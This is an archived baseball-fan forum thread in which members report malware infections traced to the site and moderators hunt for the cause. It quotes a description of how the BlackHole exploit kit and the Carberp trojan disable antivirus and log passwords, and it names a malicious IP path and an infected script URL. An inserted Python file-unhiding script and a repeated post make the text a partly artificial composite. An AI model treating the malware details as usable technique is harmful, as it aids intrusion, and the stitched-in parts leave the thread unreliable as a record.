All's well that ends well, and thus far, it appears as though, if I have not gotten it 100% entirely, I've gotten rid of most of it and most everything that it disrupted on my computer. I have Thursday off, so I'm going to take some time Thursday night and go through my computer quite intensely, making sure that I either have it 100% done away with or that I get whatever aspects might possibly be left of it.

One thing I am no longer going to do is leave my computer running 24/7. Up until this happened, I NEVER shut my computer off (only when going away on vacation, etc. where I would be away for like a week or better), but otherwise, my computer ran all the time. Now, anytime I leave or am going to be away from it for a while, I go ahead and shut it down. I've really narrowed down a lot of programs I had that were set to "start up @ startup", which could make starting my computer up seemingly take FOREVER, but now, I only have like one prog. that starts @ startup, so it takes no time for my computer to boot up now, which makes shutting it down/rebooting no big deal now.

I hope the guy that said all of his parents files got wiped out reads this thread and tries the unhide.exe prog. - I would hate to see his parents "lose" their files, thinking they're gone when the malware has simply "hidden" them. I've had a HD crash before and lost hundreds and hundreds of files and I darn well KNOW what a total pain in the butt that is. It can be a damn near nightmare to be honest, depending upon how many/what type of files you have. Kinda makes a person give serious thought to signing up for one of those "Carbonite" type programs! They're pretty inexpensive and if a HD DOES actually fail, they have all of your files backed up for you! I very well might go ahead and sign up for one of those services, I just think it would be worth every penny!!!

Oh yeah Boss, thanks for keeping us all updated on this as well!

Take Care man!

Boss-Hog
05-18-2011, 11:07 AM
So Boss, as far as you can tell, was it an infection here or just a false alarm? I can't figure out if I need to take any steps here. I don't appear to be having any problems, just had that darn message continuously pop up every time I clicked on a link here.

I think it was a legit infection and that two or three people received a malware attack would seem to confirm that. I don't think there's anything you need to do except use EXTREME caution if, God forbid, something similar were to happen again that causes the warning to appear (in Firefox and Chrome...it did not appear in IE, which is another issue altogether). Otherwise, the only other advice I have is what's already been mentioned and is good practice for anyone using the internet (not just in the situation we had): have antivirus and anti-malware scans automatically run on a frequent basis and ensure the definitions are always kept up to date.

GIK and I have some work to do that is going to take some time and goes beyond "just" this malware attack, but one of the end results of that work, once completed, is to ensure something like this never happens again.

Boss-Hog
05-18-2011, 11:08 AM
Boss-Hog, please don't think in ANY way whatsoever that I blame you or RedsZone for this...it isn't you guys' fault whatsoever. It's just one of those things that happens. And yes, me not keeping my antivirus, etc. up-to-date and running made me EXTREMELY susceptible. I was actually thinking I might not have gotten it from RZ, but 3 ppl. who all seemed to become infected the same day/around the same time makes me almost 100% certain that it came from here. I think it's just too much of a coincidence to think otherwise.

But once again, it's NOT your fault and I'm NOT upset w/you or w/RedsZone....nothing like that at all. So no need for you to apologize about it, Boss! :beerme:

All's well that ends well, and thus far, it appears as though, if I have not gotten it 100% entirely, I've gotten rid of most of it and most everything that it disrupted on my computer. I have Thursday off, so I'm going to take some time Thursday night and go through my computer quite intensely, making sure that I either have it 100% done away with or that I get whatever aspects might possibly be left of it.

One thing I am no longer going to do is leave my computer running 24/7. Up until this happened, I NEVER shut my computer off (only when going away on vacation, etc. where I would be away for like a week or better), but otherwise, my computer ran all the time. Now, anytime I leave or am going to be away from it for a while, I go ahead and shut it down. I've really narrowed down a lot of programs I had that were set to "start up @ startup", which could make starting my computer up seemingly take FOREVER, but now, I only have like one prog. that starts @ startup, so it takes no time for my computer to boot up now, which makes shutting it down/rebooting no big deal now.

I hope the guy that said all of his parents files got wiped out reads this thread and tries the unhide.exe prog. - I would hate to see his parents "lose" their files, thinking they're gone when the malware has simply "hidden" them. I've had a HD crash before and lost hundreds and hundreds of files and I darn well KNOW what a total pain in the butt that is. It can be a damn near nightmare to be honest, depending upon how many/what type of files you have. Kinda makes a person give serious thought to signing up for one of those "Carbonite" type programs! They're pretty inexpensive and if a HD DOES actually fail, they have all of your files backed up for you! I very well might go ahead and sign up for one of those services, I just think it would be worth every penny!!!

Oh yeah Boss, thanks for keeping us all updated on this as well!

Take Care man!

No problem...thank you for the nice (and thorough) post.

HitByPitch
05-18-2011, 06:12 PM
My computer was attacked Saturday. It looked like my HD was crashing and a pop up prompted me to click to run anti-virus software. I'm not a computer techie but it looked fishy to me so I quickly shut down and ran a system restore. Not sure if it was the right thing to do or not but it seems to be okay now. All of my files and documents were lost but I found them today as hidden files. Just wanted to share about the hidden files...

Spiritedway
05-18-2011, 09:02 PM
Long time browser of this forum, first time poster.

I received this attack on Saturday as a guest browsing the forums.

I noticed it was taking a really long time to load the pages here, to the point that after waiting 3 minutes I eventually gave up and quit the browser. Tried once more, then quit again. (During the long loads it must have been installing.)

I left for the store and when I came back I noticed my computer acting funny. About one out of every 10 clicks it sent me to a website I did not click on.

Then windows defender popped up and was telling me I had a few backdoor Trojans. Windows defender was not successful in getting rid of them so I looked for a different program.

Downloaded and ran free AVG anti-virus version and eventually got rid of it.

First trojan I've ever had that I know of. Sneaky people out there.

Anyhow, I love browsing the forums and will continue to visit.

Thanks, Jake.

Mario-Rijo
08-27-2011, 06:54 PM
Anyone experience any malware/virus issues as of late? I tried to log in here from another PC last night and believe I may have gotten some kind of virus just from starting to type my login. It wouldn't allow me to finish typing it and then I had this fake (I'm assuming) window/alert pop up and couldn't close it, so I hit the scan button attached to said alert and the next thing I know this thing is shutting down this PC due to "lack of hard drive space" or something along those lines (this after the scan took place). I eventually get the PC back up but now my desktop icons and programs are inaccessible (not even visible). Unfortunately it wasn't my PC and could be a big problem for me; anyone know of anything?

Also McAfee seemed to make note of something at that time as well.

KittyDuran
08-27-2011, 07:17 PM
I haven't tempted fate, certainly not at work. Only time other than using Tapatalk on the iPhone it's been on Chrome (very limited).

jojo
08-27-2011, 07:24 PM
Anyone experience any malware/virus issues as of late? I tried to log in here from another PC last night and believe I may have gotten some kind of virus just from starting to type my login. It wouldn't allow me to finish typing it and then I had this fake (I'm assuming) window/alert pop up and couldn't close it, so I hit the scan button attached to said alert and the next thing I know this thing is shutting down this PC due to "lack of hard drive space" or something along those lines (this after the scan took place). I eventually get the PC back up but now my desktop icons and programs are inaccessible (not even visible). Unfortunately it wasn't my PC and could be a big problem for me; anyone know of anything?

Also McAfee seemed to make note of something at that time as well.

Whatever attacked probably changed the attributes on the files (i.e. made them hidden, which is easy enough to change back). Boot into safe mode and kill them with a Malwarebytes scan and virus scan...

jojo
08-27-2011, 07:27 PM
The attack might have changed programs in the start menu etc. too, so you might want to check that as well...

For anyone who uses Mozilla for their browser, it has a great extension called adblock plus. With a few free subscriptions, it seems to block all of the flash ads that contribute to malware attacks.

Mario-Rijo
08-27-2011, 07:28 PM
Whatever attacked probably changed the attributes on the files (i.e. made them hidden, which is easy enough to change back). Boot into safe mode and kill them with a Malwarebytes scan and virus scan...

Thanks for the info Jojo, that seems like what may have happened. Problem is I was at work and not sure I can pull that off myself without other potential issues. Man I am gonna get spanked for this one.

Mario-Rijo
08-28-2011, 07:29 AM
Yep, found out that RZ was indeed the site we got the virus from; the IT guy confirmed it. Just a heads up for Boss and GIK. Again, as soon as I started to type my screen name into the login box it just started acting up/freezing up and I couldn't get past "mar", so keep an eye out.

cincyinco
08-28-2011, 02:22 PM
We had this issue previously with one of the flash ads.. Is it back?

Hillsdale87
08-28-2011, 03:37 PM
I got a virus warning when going to redszone on Friday. Luckily my anti-virus software caught it and deleted it, so no harm done.

cincyinco
08-28-2011, 04:24 PM
If this continues to happen, I would like to see alternative advertisement methods. I don't really care about ads either way, until they start compromising RedsZone members' computers.

Boss-Hog
08-28-2011, 05:49 PM
I'm not saying that it didn't come from the ads, because I really don't know, but I tend to trust Google on something like providing ads that are safe from viruses and malware. What makes you positive it's due to the RedsZone Adsense ads?

dougdirt
08-28-2011, 06:29 PM
I'm not saying that it didn't come from the ads, because I really don't know, but I tend to trust Google on something like providing ads that are safe from viruses and malware. What makes you positive it's due to the RedsZone Adsense ads?

As someone who also used adsense in the past, there have been a few times where malware/viruses snuck themselves into the ads.

Boss-Hog
08-30-2011, 03:19 PM
All,

Until I'm able to pinpoint if the issue is coming from a virus and/or malware or from the AdSense ads, I've disabled the latter. Now that they've been temporarily turned off, please let me know immediately if you continue to encounter any of these problems, as that would be very helpful in identifying the root cause.

I'm going to request that our host run a complete virus and malware scan and go from there. I will keep you posted on the progress and I sincerely apologize for any problems this may have caused.

Boss-Hog
08-30-2011, 08:46 PM
Anyone experience any malware/virus issues as of late? I tried to log in here from another PC last night and believe I may have gotten some kind of virus just from starting to type my login. It wouldn't allow me to finish typing it and then I had this fake (I'm assuming) window/alert pop up and couldn't close it, so I hit the scan button attached to said alert and the next thing I know this thing is shutting down this PC due to "lack of hard drive space" or something along those lines (this after the scan took place). I eventually get the PC back up but now my desktop icons and programs are inaccessible (not even visible). Unfortunately it wasn't my PC and could be a big problem for me; anyone know of anything?

Also McAfee seemed to make note of something at that time as well.

Our host ran a scan and could not find any infected files. With regards to the quoted post, they wanted to know this:



Could you please specify in which URL you faced the issue? If possible, could you please get back to us with the exact steps (URL and login details) to recreate the issue at our end.

Mario-Rijo
08-31-2011, 08:31 AM
Our host ran a scan and could not find any infected files. With regards to the quoted post, they wanted to know this:


Could you please specify in which URL you faced the issue? If possible, could you please get back to us with the exact steps (URL and login details) to recreate the issue at our end.

I don't know the exact URL; I mean, I typed what I normally would, www.redszone.com, and then started to type in my screen name, got to about "Mar" and then it would lock up and I couldn't enter any further letters. I was thinking, though, that it's very possible that they haven't updated certain things as of late, since technically we aren't supposed to need them updated very often because we don't really use them (because we aren't supposed to be on the 'net), like Adobe Flash Player, and if it was something in the ads that would/could explain it, right?

texasdave
08-31-2011, 02:09 PM
The same exact thing happened to me at work on Friday night. Was logging on to Redszone to check out the game thread when all computer-like heck broke loose. Powered off the computer and snuck away from that terminal quietly. I have Mozilla Firefox at home and have had no ill effects. Much to the consternation of the majority of posters on Sundeck. =)

Boss-Hog
08-31-2011, 06:12 PM
I've passed along this information to our host and we're continuing to keep ads disabled. Please let me know if you encounter any additional problems.

Mario-Rijo
08-31-2011, 06:39 PM
The same exact thing happened to me at work on Friday night. Was logging on to Redszone to check out the game thread when all computer-like heck broke loose. Powered off the computer and snuck away from that terminal quietly. I have Mozilla Firefox at home and have had no ill effects. Much to the consternation of the majority of posters on Sundeck. =)

Yeah they were also using IE, I use Firefox also.

Boss-Hog
08-31-2011, 06:43 PM
From our host:


Hello,

I could not find any issue in the domain; also, I recommend you use some browser add-ons to get rid of those kinds of ads, scripts, etc.

If you are using Firefox/Google Chrome then you can use the following add-ons:

-----
For Firefox:

https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/

For Google Chrome:

https://chrome.google.com/webstore/detail/cfhdojbkjhnklbpkdaibdccddilifddb
-----

Please use those add-ons and tell us if it makes any difference.

jojo
08-31-2011, 07:40 PM
Adblock plus works really well.....

Boss-Hog
08-31-2011, 09:54 PM
I've always used it, too, since switching to Firefox several years ago and I've never had any problems.

Boss-Hog
09-04-2011, 09:23 AM
From our host:


Hello,

Thanks for the update. From your update it is clear that only a handful of users are having the problem; maybe it's a local issue related to their machines.

Also, I don't find any pop-up while browsing the domain redszone.com. Please advise him/her to use those add-ons.

If he/she still faces any issue, please get back to us with the exact steps to duplicate the issue at our end.

Vottomatic
09-06-2011, 08:56 PM
The last 2 times I've accessed RedsZone, my AVG virus protector has detected and blocked a threat. I close it immediately, so I don't know what kind of threat it is. But that's the first time it's ever happened to me. And it's not happening when I open any other sites, and I peruse a lot of sites when I'm on here.

Boss-Hog
09-06-2011, 10:12 PM
Thanks...I will follow up again with our host.

Boss-Hog
09-06-2011, 10:19 PM
At this point, I'm 99% sure it is tied to the Google AdSense ads. In the meantime, I've turned the ads back off until we can get this problem resolved.

It would be very helpful in pinpointing which ad(s) is causing the problem if you can tell me information such as the page or pages you're seeing the detected threats on: is it on the main forums listing, the thread listing within a forum or when a thread is displayed?

Sea Ray
09-07-2011, 12:12 PM
I'll chime in that I think I was affected as well. About two weeks ago my computer had a major meltdown so I gave it to my IT guy and he said:


All your desktop icons and user files had been set to 'hidden'. I ran a system restore and took it back to Friday 8/26 (after running a few different malware/virus scans to make sure the troublemaker was cleaned out). Sounds like it might be trying to pull a scam where everything disappears, then a pop-up will run a 'free' scan then offer to 'restore' all the missing info...for a fee. After I restored, I ended up finding a program that is supposed to be able to 'unhide' everything. It actually would be easy to reset the entire file system so nothing is hidden, but there are plenty of Windows system files that SHOULD be hidden, so that would be a nightmare to try to identify and set everything to the correct status. Apparently the 'unhide' program uses info that the malware itself creates to allow everything to be restored.

When I mentioned what was posted here about the Malware attack he said "that sounds like that's it".

He was able to get me back up and running, so all's well. That computer runs WIN XP with an AOL and IE browser; however, I will say IE was one of the few programs that wasn't hidden after the attack. I don't know if that helps, but I wanted to give you all the info I could.
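The "everything disappeared" symptom in mikdavrut's and Sea Ray's posts above is the malware setting the Hidden attribute on user files; the catch Sea Ray's IT guy raises is that Windows hides plenty of files on purpose, so blindly clearing the bit everywhere is the wrong fix. The following is an added example, not part of the original thread and not the unhide.exe tool the posters used: a Python script that decides which hidden entries look like user data (Hidden set, System bit clear, not a known housekeeping name, not under OS directories or AppData) and, on Windows, clears the Hidden bit only on those. The lists of protected directory names and housekeeping file names are assumptions to tune for your environment, and the sample listing is constructed.

```python
"""Selectively clear the Hidden attribute that the 'fake hard-drive failure'
malware discussed in this thread sets on user files, while leaving alone the
files Windows hides on purpose.

Added example for this thread; it is not the unhide.exe tool the posters used.
The decision logic is plain Python so it can be reviewed and tested anywhere;
the filesystem part runs only on Windows.
"""
import ctypes
import os
import sys
from pathlib import PureWindowsPath

# Win32 file-attribute bits (same values as stat.FILE_ATTRIBUTE_HIDDEN/_SYSTEM).
HIDDEN = 0x2
SYSTEM = 0x4
DIRECTORY = 0x10

# Names Windows legitimately hides inside a user profile (assumed list; extend
# it for your environment).
LEGIT_HIDDEN_NAMES = {
    "desktop.ini", "thumbs.db", "ntuser.ini", "appdata", "application data",
    "local settings", "$recycle.bin",
}
# Nothing below these top-level directories should ever be un-hidden (assumed).
PROTECTED_DIRS = {
    "windows", "program files", "program files (x86)", "programdata",
    "system volume information", "$recycle.bin",
}


def should_unhide(path: str, attrs: int) -> bool:
    """True if the entry looks like user data the malware hid.

    It must carry HIDDEN; anything also marked SYSTEM is left alone (that is
    how Windows marks its own protected files, e.g. desktop.ini and the
    registry hives); known housekeeping names and anything under OS
    directories or AppData are skipped. Matching is case-insensitive, as NTFS is.
    """
    if not attrs & HIDDEN or attrs & SYSTEM:
        return False
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    name, parents = parts[-1], parts[:-1]
    if name.startswith("ntuser.dat") or name in LEGIT_HIDDEN_NAMES:
        return False
    if any(p in PROTECTED_DIRS or p in LEGIT_HIDDEN_NAMES for p in parents):
        return False
    return True


def plan_unhide(listing):
    """listing: iterable of (path, attrs). Returns the paths to un-hide, in order."""
    return [path for path, attrs in listing if should_unhide(path, attrs)]


def scan_profile(root: str, apply: bool = False):
    """Windows only: walk root and return the entries that should be un-hidden;
    with apply=True also clear their HIDDEN bit. Dry run by default."""
    if sys.platform != "win32":
        raise RuntimeError("needs Windows; elsewhere feed plan_unhide() a listing")
    k32 = ctypes.windll.kernel32
    k32.SetFileAttributesW.argtypes = [ctypes.c_wchar_p, ctypes.c_uint32]
    k32.SetFileAttributesW.restype = ctypes.c_int
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                attrs = os.stat(full, follow_symlinks=False).st_file_attributes
            except OSError:
                continue
            if not should_unhide(full, attrs):
                continue
            if apply and not k32.SetFileAttributesW(full, attrs & ~HIDDEN):
                continue  # failed (permissions?); leave it out of the report
            hits.append(full)
    return hits


# Constructed listing standing in for a profile after the malware ran:
# everything user-facing got HIDDEN; system housekeeping was already hidden.
SAMPLE_LISTING = [
    (r"C:\Users\tony\Documents\taxes-2010.xlsx", HIDDEN),
    (r"C:\Users\tony\Desktop\Photos", HIDDEN | DIRECTORY),
    (r"C:\Users\tony\Desktop\desktop.ini", HIDDEN | SYSTEM),
    (r"C:\Users\tony\ntuser.dat", HIDDEN | SYSTEM),
    (r"C:\Users\tony\AppData\Local\cache.bin", HIDDEN),
    (r"C:\Users\tony\Desktop\Thumbs.db", HIDDEN),
    (r"C:\Windows\System32\config\SAM", HIDDEN | SYSTEM),
    (r"C:\Users\tony\Documents\resume.docx", 0x20),  # archive bit only: untouched
]

if __name__ == "__main__":
    for p in plan_unhide(SAMPLE_LISTING):
        print("would un-hide:", p)
```

Run it as-is to see the dry-run decision on the constructed listing; on the affected Windows machine, `scan_profile(r"C:\Users\tony")` reports what would change and `scan_profile(..., apply=True)` clears the bit. Do this only after the malware itself is removed, otherwise it simply hides everything again.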

Boss-Hog
09-07-2011, 07:25 PM
I'll chime in that I think I was affected as well. About two weeks ago my computer had a major meltdown so I gave it to my IT guy and he said:



When I mentioned what was posted here about the Malware attack he said "that sounds like that's it".

He was able to get me back up and running, so all's well. That computer runs WIN XP with an AOL and IE browser; however, I will say IE was one of the few programs that wasn't hidden after the attack. I don't know if that helps, but I wanted to give you all the info I could.
Thanks for the heads up...and if RZ (or more likely, the Google AdSense ads we display) is indeed the cause, I sincerely apologize for the trouble.

top6
09-09-2011, 10:22 AM
FWIW, I had a similar experience to Sea Ray. I just gave my laptop to our IT people, so hopefully they will be able to fix it. At some point last Thursday (9/1) I must have downloaded something and it just shut down every program (except Internet Explorer, similar to Sea Ray) and kept asking me to download "fixes" to scan and clean the computer. The fake diagnostic program was called Master Utilities. (Actually, from what I've read, it doesn't shut down everything but only makes it seem like everything is shut down and/or deleted. Of course, this distinction means nothing to people as un-technically savvy as me.) I did start having problems shortly after being on Reds Zone, but to be honest, but for this thread I probably would not have tied the virus to this site. So it could have been from somewhere else entirely. But I thought I would share just in case it would be helpful to someone.

Honestly, it was a pretty old/bad laptop and I don't think the virus protection was up to date, so lesson learned on that front.

Boss-Hog
09-12-2011, 06:06 PM
All,

I have re-enabled ads after making one major change: I have disabled all Google AdSense ads from Google certified networks. We're trying to pinpoint what in the ads has caused this problem, so your feedback would be extremely valuable...we're certainly not trying to infect anyone else (not that we were trying to infect anyone in the first place). Please let us know if you continue or do not continue to have this problem from this point forward. Thanks again for your patience.

mth123
09-12-2011, 06:56 PM
All,

I have re-enabled ads after making one major change: I have disabled all Google AdSense ads from Google certified networks. We're trying to pinpoint what in the ads has caused this problem, so your feedback would be extremely valuable...we're certainly not trying to infect anyone else (not that we were trying to infect anyone in the first place). Please let us know if you continue or do not continue to have this problem from this point forward. Thanks again for your patience.

Sorry Boss,

As soon as I got into RedsZone, AVG gave me a message that it blocked a threat. There was also a message on my screen from an unfamiliar-looking virus protection saying the site was known for phishing. I closed that window w/o clicking on anything and it seems to be ok. If it helps, the ad on my screen was for Swanson Health Products.

Still a problem I'd guess.

Boss-Hog
09-12-2011, 07:07 PM
Thanks...that's helpful. I'm going to make another change to reenable what I disabled and disable something else and I'll let you know once it's complete.

Boss-Hog
09-12-2011, 07:18 PM
I've changed it to display only text-based ads instead of images and text-based ads. I suspect this will resolve the problem, but again, please let me know either way. Thanks...

Vottomatic
09-30-2011, 10:46 AM
My home computer does the same thing as mth's. AVG pops up and says it just blocked a threat.

My office computer has AVG, but maybe it's not updated. I have another protection package that scans the hard drive and it continues to find all kinds of malware and other stuff. It found 48 items this morning. Linking what is happening on my home computer to my office computer, and considering how often I'm on RedsZone, I'm thinking these threats are coming from RedsZone.

OesterPoster
09-30-2011, 11:13 AM
Since I'm the network admin, I just noticed our Websense filtering software marking hits against www.redszone.com as the following this morning:

Category: Security Malicious Web Sites
Action: Category blocked
URL Hostname: www.redszone.com

Boss-Hog
09-30-2011, 06:15 PM
Thanks for confirming...we had gone to text-based ads only, but apparently that has not solved the issue, either. I've disabled them altogether until we can get a handle on this (which I thought we had). Thanks again and our apologies for the inconvenience.

OesterPoster
10-27-2011, 09:19 AM
Just an FYI, but our Websense software is flagging this site as "malicious" again.

Category: Security Malicious Web Sites
Action: Category blocked
URL Hostname: www.redszone.com

Boss-Hog
10-29-2011, 08:36 AM
Thank you for letting us know. We've had ads completely disabled for about a month, so if there's anything to it, that at least tells us that's not where the problem resides. We'll do everything we can to pinpoint the problem, but our efforts so far have been unsuccessful. We've opened tickets with our host and I've personally run virus scans on the entire site and this continues to happen. It's very frustrating...if anyone has any suggestions, I'm all ears.

Boss-Hog
10-29-2011, 08:43 AM
FWIW, Google identifies the site as clean (http://www.google.com/safebrowsing/diagnostic?site=redszone.com). So do Norton, AVG and every other online scanning utility I've found. Regardless, I'm in the process of doing another virus scan of the entire site, but I don't expect it to turn up anything.

Boss-Hog
10-29-2011, 09:16 AM
I finished scanning the entire site and nothing was found.

Boss-Hog
11-05-2011, 10:49 AM
All,

With the help of vBulletin, we may have finally tracked down the problem, so we have reenabled ads. Please let me know immediately if you encounter any unexpected problems, and if so, as many details as possible. Thanks...

Mario-Rijo
11-08-2011, 05:53 PM
All,

With the help of vBulletin, we may have finally tracked down the problem, so we have reenabled ads. Please let me know immediately if you encounter any unexpected problems, and if so, as many details as possible. Thanks...

Can you expound on what the problem was?

Boss-Hog
11-08-2011, 07:30 PM
Can you expound on what the problem was?
We've thought we had it figured out many times in the past, so I can't definitively say that it's resolved, but there was a file in a key place whose contents did not match what it should have. I've since replaced that file with a fresh version.

mth123
12-09-2011, 07:55 PM
AVG just shut my browser down when it detected a threat. I was in the Cahill thread when it happened, but I had not clicked on any of the links. I'm guessing it was one of the ads, but I wasn't really paying attention to which one was on screen.

Boss-Hog
12-10-2011, 08:09 AM
Anyone else had any problems? We haven't made any kind of recent changes that would account for something like this.


AVG just shut my browser down when it detected a threat. I was in the Cahill thread when it happened, but I had not clicked on any of the links. I'm guessing it was one of the ads, but I wasn't really paying attention to which one was on screen.

Vottomatic
01-14-2012, 02:38 PM
Just pulled up the page and my virus protector said it blocked a threat. Everything is fine now. Just wanted to point that out.

mth123
01-14-2012, 07:53 PM
Just pulled up the page and my virus protector said it blocked a threat. Everything is fine now. Just wanted to point that out.

I got one today too. Something about a "Black Hole" virus on this page.

Vottomatic
01-15-2012, 09:22 AM
I just pulled it up again and it said threat was blocked. Under type it called it "blackhole" something-er-uver.

KoryMac5
01-15-2012, 09:28 AM
Antivirus blocked this nasty bug yesterday. Here is the scoop from the antivirus forums:

Symantec Warns: BlackHole toolkit is spreading like wildfire (Trojan.Carberp)
on: 21. February 2011., 07:12:26

--------------------------------------------------------------------------------

Symantec has cautioned about the BlackHole toolkit, which has a powerful set of exploits and is spreading like wildfire. In a release issued on Monday, Symantec said that at present, it is the most prevalent exploit toolkit in the wild and can easily be compared with the likes of Neosploit and Phoenix in terms of the number of affected users.

Symantec recently reported the increasing utilization of sophisticated toolkits by criminals who would otherwise lack the technical expertise for cyber attacks, fueling a self-sustaining, profitable, and increasingly organized global economy.

Toolkits account for 61 per cent of all threat activity on malicious websites

In recent times, BlackHole has clearly emerged as the most used toolkit among hackers. The following IPS graph proves this fact, since more than 100,000 malicious hits are reported each day:

[IPS graph of daily malicious hits; image not reproduced]

How BlackHole works:

When victims visit a clean site that has been injected with a malicious iFrame, they are redirected to the BlackHole exploit kit server. BlackHole obfuscates the exploits for popular vulnerabilities such as PDF, JAVA, HCP, MDAC, etc.

The page contains the code that redirects the user to download a malicious jar file. One of the classes inside the jar file extracts the value passed to it in the script, and then decodes it into a URL. This URL is then used to perform other malicious downloads.

The URL downloads Trojan.Carberp, which is a highly sophisticated Trojan that is being compared to ZeuS because of its ingenious techniques for avoiding detection.

The Trojan posts a unique ID to the command-and-control (C&C) server that will be used every time a transaction takes place between the Trojan and the C&C server. Next, the Trojan will post all of the running processes on the victim's computer to the C&C server.

The Trojan then downloads three modules:

- stopav.plug – This module disables the antivirus installed on the victim's computer.
- miniav.plug – Checks for the presence of other Trojans, such as Zeus, and if found, the Trojan deletes its competitor(s).
- passw.plug – It will log every username/password combination that is typed, as well as any URLs visited.

The C&C server sends the "multidownload" command to the Trojan:

- The first file downloaded is Trojan Hiloti (a.k.a. Trojan.Zefarch), which makes requests to a free file-hosting site.
- The second file downloaded (2.exe) is FakeAV

Vottomatic
01-16-2012, 10:15 AM
I just pulled up the site and it blocked another threat. Here is what my AVG protection says:

Threat was blocked!
File name: 65.75.141.139/Home/index.php
Threat name: Exploit Blackhole Exploit Kit (type 2095)

I hope this helps.

jojo
01-16-2012, 11:14 AM
Redszone is getting flagged by Sophos with every page navigated to....

Boss-Hog
01-16-2012, 11:17 AM
Thanks, I'll open a ticket with our host.

Boss-Hog
01-16-2012, 10:41 PM
Here's what our host had to say - honestly, I'm not sure where this leaves us, as I'm at a loss as to what direction to head next. If you have any suggestions, I'm all ears.


Hello,

I have scanned the server using RKhunter and couldn't find any malicious file from it.

---
[13:48:29] System checks summary
[13:48:29] =====================
[13:48:29]
[13:48:29] File properties checks...
[13:48:29] Required commands check failed
[13:48:29] Files checked: 135
[13:48:29] Suspect files: 6
[13:48:29]
[13:48:29] Rootkit checks...
[13:48:29] Rootkits checked : 248
[13:48:29] Possible rootkits: 0
[13:48:29]
[13:48:29] Applications checks...
[13:48:29] Applications checked: 9
[13:48:29] Suspect applications: 2
[13:48:29]
[13:48:29] The system checks took: 21 minutes and 23 seconds
[13:48:29]
[13:48:29] Info: End date is Mon Jan 16 13:48:29 EST 2012
---

I could see that the detected files are valid. I have scanned the "/home" folder using Clamscan. It also didn't detect any malicious file.
It only detected some mails, which can be excluded.

---
[root@host ~]# tail test

----------- SCAN SUMMARY -----------
Known viruses: 1118387
Engine version: 0.97.1
Scanned directories: 1127
Scanned files: 70243
Infected files: 1323
Data scanned: 971.39 MB
Data read: 2921.17 MB (ratio 0.33:1)
Time: 573.856 sec (9 m 33 s)

[root@host ~]# grep -i found test > result
[root@host ~]#

[root@host ~]# cat result|grep -vi mail
[root@host ~]#
---

I have also scanned the website online. They also didn't detect any virus in the site "redszone.com". Please verify this using the following URLs.

---
http://www.avgthreatlabs.com/sitereports/domain/redszone.com/domain-search-widget/www.avg.com.au
http://www.urlvoid.com/
http://onlinelinkscan.com/
---

I could not find any malicious content in the server. Please let us know, if you need any further assistance.

Boss-Hog
01-17-2012, 06:36 AM
Here's what we need from you guys that are affected by this issue:


Hello,

As we have already updated, our scan results are showing nothing suspicious in the web root. We could confirm this from the following online scanner from AVG antivirus solutions.

--
http://www.avgthreatlabs.com/sitereports/domain/redszone.com/domain-search-widget/www.avg.com.au
--

Can you get back to us with any one of the URLs (specific URLs) that your clients see as problematic?

dougdirt
01-17-2012, 09:51 AM
Could be coming from the ads, Boss. If that is the case, then it won't be on your server and won't be found.

No clue if there is anything to it, but it wouldn't be the first time that it has happened on the internet.

Boss-Hog
01-17-2012, 10:07 AM
We have considered that possibility, but we've looked into it on the AdSense side and have not seen any substantiated reports that confirm it's the ads. Given how widespread AdSense is, you'd think there would be others with the same problem.

Regardless, we have temporarily eliminated ads from a couple of users that have reported malware warnings and we want to see what this does. If anyone else has received these warnings and would like to do a similar test, please send me a PM.

Vottomatic
01-18-2012, 07:13 AM
Even with the ads gone, I'm still getting threats almost every time I open the site.

Boss-Hog
01-18-2012, 07:14 AM
Even with the ads gone, I'm still getting threats almost every time I open the site.
Anyone else having this? I think this rules out the ads as the root cause.

Vottomatic
01-18-2012, 06:45 PM
Well, I've opened it a bunch today and it hasn't happened since this morning when I posted about it.

Ravenlord
01-19-2012, 12:42 AM
Anyone else having this? I think this rules out the ads as the root cause.

First time I've posted in God-knows-when, and I had a worm alert pop on my Norton anti-virus on the Stubbs as #8 hitter thread I posted.

Boss-Hog
01-19-2012, 06:44 AM
All,

We need URLs from the site where the attacks are coming from; otherwise, there's nothing to connect the two. Thanks for your help.

Boss-Hog
01-19-2012, 11:05 AM
First time I've posted in God-knows-when, and I had a worm alert pop on my Norton anti-virus on the Stubbs as #8 hitter thread I posted.
Ravenlord, here's what our host had to say about this - if you (or anyone else affected) could supply the bolded information, we would greatly appreciate it. Thanks in advance.


Hello,

I have checked the server in detail. I could find that the URL "http://www.redszone.com/forums/showthread.php?t=93571" is being served by accessing the database.

I have checked the tables corresponding to the thread 93571. But I could not find any attachments or suspicious files that are linked to it. Please see the corresponding table pasted below.

--
mysql> select * from thread where threadid=93571;
threadid: 93571
title: Drew Stubbs is the perfect #8 hitter.
lastpost: 1326948915
forumid: 7
pollid: 0
open: 1
replycount: 17
postusername: WebScorpion
postuserid: 28
lastposter: Ravenlord
dateline: 1326849525
lastedit: 1326860498
views: 749
iconid: 0
notes:
visible: 1
sticky: 0
votenum: 0
votetotal: 0
attach: 0
closereason:
firstpostid: 2526149
similar: 87133, 80390, 68946, 78719, 48675
rss_feed: 0
rss_date:
hiddencount: 0
deletedcount: 0
lastpostid: 2526762
wrdate:
prefixid:
taglist: lineup, stubbs
--

But I am still not sure about some of the values in the table. Can you please get back to us with the details of the malware that was detected by the antivirus? This data would be available in the detection report of the antivirus.
Also, please discuss this issue with a database programmer, as the issue goes deeper into the code and we are facing more limitations.

Thank you for the understanding.

TRF
01-20-2012, 05:28 PM
I have a fresh install of Windows 7, running Symantec anti virus, and have had no issues whatsoever. All my antivirus is up to date.

Ravenlord
01-21-2012, 12:31 AM
info sent, hope it works.

Boss-Hog
01-21-2012, 10:17 AM
info sent, hope it works.
Who did you send it to?

jojo
01-21-2012, 06:16 PM
I don't know if this is actually much help, but this is what Sophos just flagged:

Virus/spyware 'Mal/Iframe-X' has been detected in "http://www.redszone.com/forums/clientscript/vbulletin_menu.php".

Boss-Hog
01-21-2012, 07:30 PM
I don't know if this is actually much help, but this is what Sophos just flagged:

Virus/spyware 'Mal/Iframe-X' has been detected in "http://www.redszone.com/forums/clientscript/vbulletin_menu.php".

That helps...I will look into it.

Boss-Hog
01-21-2012, 09:02 PM
I've confirmed that was a malicious file and it has been removed. Please let me know if this continues, and if so, the URL(s).
